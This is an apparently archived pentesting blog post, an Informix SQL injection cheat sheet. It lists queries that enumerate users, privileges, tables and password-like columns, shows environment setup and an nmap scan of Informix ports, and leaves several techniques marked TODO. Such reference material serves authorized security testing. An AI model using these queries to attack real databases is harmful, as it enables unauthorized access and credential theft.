{"id":89,"date":"2008-11-22T19:11:36","date_gmt":"2008-11-22T19:11:36","guid":{"rendered":"http:\/\/pentestmonkey.net\/?p=89"},"modified":"2011-11-11T17:33:38","modified_gmt":"2011-11-11T17:33:38","slug":"informix-sql-injection-cheat-sheet","status":"publish","type":"post","link":"https:\/\/pentestmonkey.net\/cheat-sheet\/sql-injection\/informix-sql-injection-cheat-sheet","title":{"rendered":"Informix SQL Injection Cheat Sheet"},"content":{"rendered":"<p>Some useful syntax reminders for SQL Injection into Informix databases&#8230;<\/p>\n<p><!--more--><\/p>\n<p>Below are some tabulated notes on how to do many of thing you&#8217;d normally do via SQL injection.\u00a0 All tests were performed on Informix Dynamic Server Express Edition 11.5 for Windows.\u00a0 The Informix download page is <a href=\"http:\/\/www.ibm.com\/developerworks\/downloads\/im\/dsexp\/?S_TACT=105AGX11&amp;S_CMP=LP\">here<\/a>.<\/p>\n<p>This post is part of series of SQL Injection Cheat Sheets.\u00a0 In this series, I&#8217;ve endevoured to tabulate the data to make it easier to read and to use the same table for for each database backend.\u00a0 This helps to highlight any features which are lacking for each database, and enumeration techniques that don&#8217;t apply and also areas that I haven&#8217;t got round to researching yet.<\/p>\n<p>The complete list of SQL Injection Cheat Sheets I&#8217;m working is:<\/p>\n<ul>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/oracle-sql-injection-cheat-sheet\/\">Oracle<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/mssql-sql-injection-cheat-sheet\/\">MSSQL<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/mysql-sql-injection-cheat-sheet\/\">MySQL<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/postgres-sql-injection-cheat-sheet\/\">PostgreSQL<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/ingres-sql-injection-cheat-sheet\/\">Ingres<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/db2-sql-injection-cheat-sheet\/\">DB2<\/a><\/li>\n<li><a href=\"http:\/\/pentestmonkey.net\/blog\/informix-sql-injection-cheat-sheet\/\">Informix<\/a><\/li>\n<\/ul>\n<p>I&#8217;m not planning to write one for MS Access, but there&#8217;s a great <a href=\"http:\/\/nibblesec.org\/files\/MSAccessSQLi\/MSAccessSQLi.html\">MS Access Cheat Sheet here<\/a>.<\/p>\n<table border=\"1\">\n<tbody>\n<tr>\n<td>Version<\/td>\n<td>SELECT DBINFO(&#8216;version&#8217;, &#8216;full&#8217;) FROM systables WHERE tabid = 1;<br \/>\nSELECT DBINFO(&#8216;version&#8217;, &#8216;server-type&#8217;) FROM systables WHERE tabid = 1;<br \/>\nSELECT DBINFO(&#8216;version&#8217;, &#8216;major&#8217;), DBINFO(&#8216;version&#8217;, &#8216;minor&#8217;), DBINFO(&#8216;version&#8217;, &#8216;level&#8217;) FROM systables WHERE tabid = 1;<br \/>\nSELECT DBINFO(&#8216;version&#8217;, &#8216;os&#8217;) FROM systables WHERE tabid = 1; &#8212; T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix<\/td>\n<\/tr>\n<tr>\n<td>Comments<\/td>\n<td>select 1 FROM systables WHERE tabid = 1; &#8212; comment<\/td>\n<\/tr>\n<tr>\n<td>Current User<\/td>\n<td>SELECT USER FROM systables WHERE tabid = 1;<br \/>\nselect CURRENT_ROLE FROM systables WHERE tabid = 1;<\/td>\n<\/tr>\n<tr>\n<td>List Users<\/td>\n<td>select username, usertype, password from sysusers;<\/td>\n<\/tr>\n<tr>\n<td>List Password Hashes<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>List Privileges<\/td>\n<td>select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; &#8212; which tables are accessible by which users<br \/>\nselect procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; &#8212; which procedures are accessible by which users<\/td>\n<\/tr>\n<tr>\n<td>List DBA Accounts<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Current Database<\/td>\n<td>SELECT DBSERVERNAME FROM systables where tabid = 1; &#8212; server name<\/td>\n<\/tr>\n<tr>\n<td>List Databases<\/td>\n<td>select name, owner from sysdatabases;<\/td>\n<\/tr>\n<tr>\n<td>List Columns<\/td>\n<td>select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;<\/td>\n<\/tr>\n<tr>\n<td>List Tables<\/td>\n<td>select tabname, owner FROM systables;<br \/>\nselect tabname, viewtext FROM sysviews\u00a0 join systables on systables.tabid = sysviews.tabid;<\/td>\n<\/tr>\n<tr>\n<td>List Stored Procedures<\/td>\n<td>select procname, owner FROM sysprocedures;<\/td>\n<\/tr>\n<tr>\n<td>Find Tables From Column Name<\/td>\n<td>select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like &#8216;%pass%&#8217;;<\/td>\n<\/tr>\n<tr>\n<td>Select Nth Row<\/td>\n<td>select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; &#8212; selects the 10th row<\/td>\n<\/tr>\n<tr>\n<td>Select Nth Char<\/td>\n<td>SELECT SUBSTRING(&#8216;ABCD&#8217; FROM 3 FOR 1) FROM systables where tabid = 1; &#8212; returns &#8216;C&#8217;<\/td>\n<\/tr>\n<tr>\n<td>Bitwise AND<\/td>\n<td>select bitand(6, 1) from systables where tabid = 1; &#8212; returns 0<br \/>\nselect bitand(6, 2) from systables where tabid = 1; &#8212; returns 2<\/td>\n<\/tr>\n<tr>\n<td>ASCII Value -&gt; Char<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Char -&gt; ASCII Value<\/td>\n<td>select ascii(&#8216;A&#8217;) from systables where tabid = 1;<\/td>\n<\/tr>\n<tr>\n<td>Casting<\/td>\n<td>select cast(&#8216;123&#8217; as integer) from systables where tabid = 1;<br \/>\nselect cast(1 as char) from systables where tabid = 1;<\/td>\n<\/tr>\n<tr>\n<td>String Concatenation<\/td>\n<td>SELECT &#8216;A&#8217; || &#8216;B&#8217; FROM systables where tabid = 1; &#8212; returns &#8216;AB&#8217;<br \/>\nSELECT concat(&#8216;A&#8217;, &#8216;B&#8217;) FROM systables where tabid = 1; &#8212; returns &#8216;AB&#8217;<\/td>\n<\/tr>\n<tr>\n<td>String Length<\/td>\n<td>SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;<\/td>\n<\/tr>\n<tr>\n<td>If Statement<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Case Statement<\/td>\n<td>select tabid, case when tabid&gt;10 then &#8220;High&#8221; else &#8216;Low&#8217; end from systables;<\/td>\n<\/tr>\n<tr>\n<td>Avoiding Quotes<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Time Delay<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Make DNS Requests<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Command Execution<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Local File Access<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Hostname, IP Address<\/td>\n<td>SELECT DBINFO(&#8216;dbhostname&#8217;) FROM systables WHERE tabid = 1; &#8212; hostname<\/td>\n<\/tr>\n<tr>\n<td>Location of DB files<\/td>\n<td>TODO<\/td>\n<\/tr>\n<tr>\n<td>Default\/System Databases<\/td>\n<td>These are the system databases:<br \/>\nsysmaster<br \/>\nsysadmin*<br \/>\nsysuser*<br \/>\nsysutils*<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>* = don&#8217;t seem to contain anything \/ don&#8217;t allow readingInstalling Locally<\/p>\n<p>You can download <a href=\"http:\/\/www.ibm.com\/developerworks\/downloads\/im\/dsexp\/?S_TACT=105AGX11&amp;S_CMP=LP\">Informix Dynamic Server Express Edition 11.5 Trial<\/a> for Linux and Windows.<\/p>\n<p>Database ClientThere&#8217;s a <a href=\"http:\/\/www14.software.ibm.com\/webapp\/download\/search.jsp?rs=ifxdl\">database client SDK<\/a> available, but I couldn&#8217;t get the demo client working.<br \/>\nI used <a href=\"http:\/\/squirrel-sql.sourceforge.net\/\">SQuirreL SQL Client Version 2.6.8<\/a> after installing the <a href=\"http:\/\/www14.software.ibm.com\/webapp\/download\/search.jsp?go=y&amp;rs=ifxjdbc\">Informix JDBC drivers<\/a> (&#8220;emerge dev-java\/jdbc-informix&#8221; on Gentoo).Logging in from command line<\/p>\n<p>If you get local admin rights on a Windows box and have a GUI logon:<\/p>\n<ul>\n<li>Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername.\u00a0 This will give you a command prompt with various Environment variables set properly.<\/li>\n<li>Run dbaccess.exe from your command prompt.\u00a0 This will bring up a text-based GUI that allows you to browse databases.<\/li>\n<\/ul>\n<p>The following were set on my test system.\u00a0 This may help if you get command line access, but can&#8217;t get a GUI &#8211; you&#8217;ll need to change &#8220;testservername&#8221;:<\/p>\n<pre>set INFORMIXDIR=C:PROGRA~1IBMIBMINF~111.50\r\nset INFORMIXSERVER=testservername\r\nset ONCONFIG=ONCONFIG.testservername\r\nset PATH=C:PROGRA~1IBMIBMINF~111.50bin;C:WINDOWSsystem32;C:WINDOWS;C:WINDOWSSystem32Wbem;C:PROGRA~1ibmgsk7bin;C:PROGRA~1ibmgsk7lib;C:Program FilesIBMInformixClien-SDKbin;C:Program Filesibmgsk7bin;C:Program Filesibmgsk7lib\r\nset CLASSPATH=C:PROGRA~1IBMIBMINF~111.50extendkrakatoakrakatoa.jar;C:PROGRA~1IBMIBMINF~111.50xtendkrakatoajdbc.jar;\r\nset DBTEMP=C:PROGRA~1IBMIBMINF~111.50infxtmp\r\nset CLIENT_LOCALE=EN_US.CP1252\r\nset DB_LOCALE=EN_US.8859-1\r\nset SERVER_LOCALE=EN_US.CP1252\r\nset DBLANG=EN_US.CP1252\r\nmode con codepage select=1252<\/pre>\n<pre>Identifying on the network<\/pre>\n<p>My default installation listened on two TCP ports: 9088 and 9099.\u00a0 When I created a new &#8220;server name&#8221;, this listened on 1526\/TCP by default.\u00a0 Nmap 4.76 didn&#8217;t identify these ports as Informix:<\/p>\n<p>$ sudo nmap -sS -sV 10.0.0.1 -p- -v &#8211;version-all<br \/>\n&#8230;<br \/>\n1526\/tcp open\u00a0 pdap-np?<br \/>\n9088\/tcp open\u00a0 unknown<br \/>\n9089\/tcp open\u00a0 unknown<br \/>\n&#8230;<br \/>\nTODO How would we identify Informix listening on the network?<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Some useful syntax reminders for SQL Injection into Informix databases&#8230;<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[8],"tags":[46,44,71],"_links":{"self":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/89"}],"collection":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/comments?post=89"}],"version-history":[{"count":3,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/89\/revisions"}],"predecessor-version":[{"id":304,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/posts\/89\/revisions\/304"}],"wp:attachment":[{"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/media?parent=89"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/categories?post=89"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/pentestmonkey.net\/wp-json\/wp\/v2\/tags?post=89"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}